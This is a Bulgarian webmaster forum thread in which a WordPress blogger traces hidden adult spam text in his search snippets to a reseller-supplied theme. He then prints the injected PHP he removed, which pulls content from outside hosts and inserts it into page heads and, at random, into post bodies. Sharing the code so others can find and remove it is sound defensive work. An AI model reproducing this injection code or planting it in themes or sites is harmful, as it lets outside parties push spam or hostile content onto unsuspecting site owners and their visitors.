Помощ - Гугъл индексира страници ми с някакъв спам

scorebg

Active Member
Здравейте, имам общото взето голям проблем.
Имам скромен блог на wordpress платформа в който качвам съдържание но проблема е че като видя как се индексират страниците ми излиза:
"The biggest danger to your sex life is boredom and you never want to feel like having sex online just going through the motions on repeat. There are thousands"
Нещо по някакъв начин има някаква гадория, която "пренаписва " за пред гугъл текстът. Излиза на като описание на тагове, страници и какво ли още не.
Имате ли някакви идей от къде да търся за да го оправя.

Малко информация са блогът:
Ползвам:Wordpres 3.3.1
и всичко на всичко три плугин-а
SEO Friendly Images
W3 Total Cache и
WordPress SEO другите
Akismet,Hello Dolly и WP-Protect са изключени.

Ще съм благодарен на всякакви идей за помощ.
Благодаря.
 
От: Помощ - Гугъл индексира страници ми с някакъв спам

Явно го има в сайта този текст, щом излиза при индексирането. Кажи кой е сайта да го видим!
 
От: Помощ - Гугъл индексира страници ми с някакъв спам

Явно го има в сайта този текст, щом излиза при индексирането. Кажи кой е сайта да го видим!

За момента няма да сложа сайтът да не счита като реклама или трупане на линкове.

Ами много сайтове имат този проблем - търси в google тази фраза
The biggest danger to your sex life is boredom and you never want to feel like having sex online just going through the motions on repeat.
и излизат доста

ето един сайт със същия проблем:http://pamporovoskicup.com/2012/02/opening-day/

Изпълнява се
Код:
<div style="display:none">The biggest danger to your sex life is boredom and you never want to feel like having sex  online just going through the motions on rep... ....... и т.н една карамара простотий .</div>

Проблема е, че немога да намеря да намеря какво го изпълнява това в index.php,header.php или където и да е било, някой някъде е заменил нещо, но най-вероятно се зарежда като js или нещо някъде е скрито защото го няма никъде като текст в php кода.
 
От: Помощ - Гугъл индексира страници ми с някакъв спам

Каква тема използваш ?Ако темата ти е безплатна или платена, но от някой сайт за nulled теми е възможно от там да е проблема.
 
От: Помощ - Гугъл индексира страници ми с някакъв спам

Ясно е че е от темата, и преди бях с нея сега съм с по-нова версия, уж е купена от reseller ама явно е решил да понатрупа още дивиденти или просто не е такъв....
Имам стария код с който всичко беше наред и търся какво е добявано ... на много места е сложено това паразитно нещо :)
 
От: Помощ - Гугъл индексира страници ми с някакъв спам

Реших проблемът - просто са добавени 2-3 реда код, допълнителен. Интересното е че намирам и страници на интернет доставчици със същия проблем, което за мен е крайно интересно:

Сега ако някой има същия проблем с друга тема ,безплатна платена или каквото и да било, най-вероятно има някъде такъв код:

PHP:
if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "http://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init();	$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}
function ins_php_in_post($content){$percentage = 25;if (rand(0, 100) < $percentage){ob_start();if(function_exists('curl_init')) { $url = "http://www.jquerys.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data"; }$text = ob_get_clean();$pos = rand(0, strlen($content));$txtPrePos = substr($content, 0, $pos);$txtPostPos = substr($content, $pos);$openPos = strrpos($txtPrePos, "<");if ($openPos !== false){$closePos = strrpos($txtPrePos, ">");if ($openPos > $closePos || $closePos === false){$pos = strpos($content, ">", $pos) + 1;}}$spos = strpos($content, " ", $pos);if ($spos === false)	{$spos = strlen($content);}$content = substr($content, 0, $spos) . " " . $text . substr($content, $spos);}return $content;}
add_filter('the_content', 'ins_php_in_post');

Махате го и сте готови, благодаря за съдействието.
 

Горе